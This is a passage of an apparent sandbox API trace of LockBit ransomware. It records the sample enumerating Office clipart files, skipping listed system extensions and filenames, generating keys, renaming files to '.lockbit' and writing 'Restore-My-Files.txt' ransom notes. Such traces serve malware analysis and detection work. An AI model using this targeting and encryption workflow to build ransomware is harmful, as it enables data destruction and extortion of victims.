[0159.426] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382938.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0159.433] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.433] malloc (_Size=0x40068) returned 0x3df0008 [0159.433] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=99539) returned 1 [0159.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0159.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0159.434] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0159.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.438] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.438] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.440] free (_Block=0x1fa2ed8) [0159.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.440] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1aba5, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382939.JPG", cAlternateFileName="")) returned 1 [0159.440] lstrcmpiW (lpString1=".", lpString2="J0382939.JPG") returned -1 [0159.440] lstrcmpiW (lpString1="..", lpString2="J0382939.JPG") returned -1 [0159.440] PathFindExtensionW (pszPath="J0382939.JPG") returned=".JPG" [0159.440] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.440] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.440] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.440] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.440] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.441] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.441] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.442] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382939.JPG") returned 1 [0159.443] lstrcmpiW (lpString1="ntldr", lpString2="J0382939.JPG") returned 1 [0159.443] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382939.JPG") returned 1 [0159.443] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382939.JPG") returned -1 [0159.443] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382939.JPG") returned -1 [0159.443] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382939.JPG") returned 1 [0159.443] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382939.JPG") returned -1 [0159.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG") returned=".JPG" [0159.443] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.443] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.443] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.443] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.444] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.444] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.444] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG.lockbit") returned 72 [0159.445] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382939.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0159.446] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.446] malloc (_Size=0x40068) returned 0x1ff1e60 [0159.446] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=109477) returned 1 [0159.446] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0159.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0159.447] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0159.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.457] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.457] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.458] free (_Block=0x1fa2ed8) [0159.458] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.458] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.458] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.459] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56798470, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1653a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382942.JPG", cAlternateFileName="")) returned 1 [0159.459] lstrcmpiW (lpString1=".", lpString2="J0382942.JPG") returned -1 [0159.459] lstrcmpiW (lpString1="..", lpString2="J0382942.JPG") returned -1 [0159.459] PathFindExtensionW (pszPath="J0382942.JPG") returned=".JPG" [0159.459] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.459] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.459] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0159.460] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0159.460] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0382942.JPG") returned 1 [0159.461] lstrcmpiW (lpString1="ntldr", lpString2="J0382942.JPG") returned 1 [0159.461] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0382942.JPG") returned 1 [0159.461] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0382942.JPG") returned -1 [0159.461] lstrcmpiW (lpString1="autorun.inf", lpString2="J0382942.JPG") returned -1 [0159.461] lstrcmpiW (lpString1="thumbs.db", lpString2="J0382942.JPG") returned 1 [0159.461] lstrcmpiW (lpString1="iconcache.db", lpString2="J0382942.JPG") returned -1 [0159.461] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0159.461] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG") returned=".JPG" [0159.461] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0159.461] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0159.461] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0159.462] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0159.462] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0159.462] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG.lockbit") returned 72 [0159.462] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382942.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0159.468] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0159.468] malloc (_Size=0x40068) returned 0x3d70450 [0159.468] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=91450) returned 1 [0159.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.468] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0159.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0159.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0159.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0159.469] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0159.472] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0159.472] malloc (_Size=0xa6) returned 0x1fa2ed8 [0159.472] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0159.474] free (_Block=0x1fa2ed8) [0159.474] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0159.474] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0159.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0159.474] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661aebd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13e1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0382944.JPG", cAlternateFileName="")) returned 1 [0159.474] lstrcmpiW (lpString1=".", lpString2="J0382944.JPG") returned -1 [0159.474] lstrcmpiW (lpString1="..", lpString2="J0382944.JPG") returned -1 [0159.474] PathFindExtensionW (pszPath="J0382944.JPG") returned=".JPG" [0159.474] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0159.474] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0159.474] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0159.474] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0159.474] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0159.474] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0159.474] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0159.474] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0159.475] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0159.475] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0159.476] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0159.476] lstrcmpiW (lpString1=".mp3", 